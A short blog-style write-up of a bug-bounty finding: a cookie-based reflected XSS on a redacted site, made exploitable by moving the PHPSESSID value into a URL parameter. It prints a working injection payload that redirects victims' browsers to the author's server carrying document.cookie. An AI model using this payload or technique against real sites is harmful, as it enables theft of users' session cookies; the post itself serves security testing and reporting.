Cookie-based-injection XSS making exploitable with-out exploiting other Vulns.

Hi all,

This is a short blog post about making exploitable Cookie based XSS.

I was testing a site [redacted.com] can’t take name for Obvious reasons. I was testing it on the Repeater tab on the burp and testing a parameter which was reflecting back on the HTML page but encoded.

URL:- http://[redacted.com]/path/file.php?f=a*&location=12

* was the injection point I was trying.

<script type="text/javascript">
    page.perform('a*', 12);
</script>

I was trying to bypass the filter by injecting different payload again and again (means sending requests again and again) and all of the sudden I got another parameter reflected on the page which was cookie parameter which was not reflected before. How?

Frankly I don’t know?

<script type="text/javascript">
    page.perform('a*', 12, '&PHPSESSID=73uj42unj5vu6urg6v4aa8');
</script>

I was literally surprised that How I got this new parameter reflected on the page and why not before. Okay go on, now I started to see if that cookie parameter can be injected or not and to my surprised it was inject-able.

Now I got XSS injection point but the main thing is How Can I exploit it against users ?

For making cookie based XSS injection exploitable you might need to exploit another vulnerability i.e. CRLF (because you can then try %0d%0aSet-Cookie). I tried to find out but didn’t get it.

Next I got an idea what if I place that Cookie parameter into the URL GET parameters like this:-

http://[redacted.com]/path/file.php?f=a&location=12&PHPSESSID={payload}

payload:-

a’);document.location=”http://myserver/"%2bdocument.cookie;test('.

and yeah it works the same. Wow! I got all the cookies on my server. I quickly reported it to the team. :)

It was a good case for me.

AND one thing I got to learn is that if you got cookie based injection then you should also check by replace the parameter from cookie header to URL parameter like when you do POST to GET to make easy exploitable.

Thanks